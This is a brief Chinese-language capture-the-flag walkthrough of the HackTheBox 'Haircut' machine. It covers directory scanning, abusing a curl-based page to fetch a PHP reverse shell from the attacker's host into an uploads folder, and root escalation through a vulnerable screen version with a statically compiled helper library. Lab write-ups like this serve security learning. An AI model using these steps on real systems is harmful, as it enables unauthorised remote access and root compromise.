Haircut - HackTheBox

nmap扫描



访问80端口

就一张图片,扫个目录
gobuster dir -u "http://10.10.10.24" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,sh,pl -t 30


有点像ssrf

执行之后还是一张图片,看看能不能反弹shell回来


被过滤了,感觉是curl,应该能重定向文件
准备一个php反弹shell
http://10.10.14.13/php-reverse-shell.php -o /var/www/html/test.php

无权限写,但之前扫目录的时候发现一个uploads目录,往那里写一下

好像成功了,访问一下

提权

又是pkexec,换一种方式吧

screen这个版本有权限提升漏洞


先创建两个文件,libhax.c,rootshell.c


让靶机下载编译

这个问题好像是gcc版本问题,先编译好再让靶机下载
采用静态编译
gcc -fPIC -shared -ldl -o libhax.so libhax.c --static




然后依次执行这些命令

rootshell文件即会拥有suid权限,执行就会触发rootshell里面的/bin/bash,达到权限提升

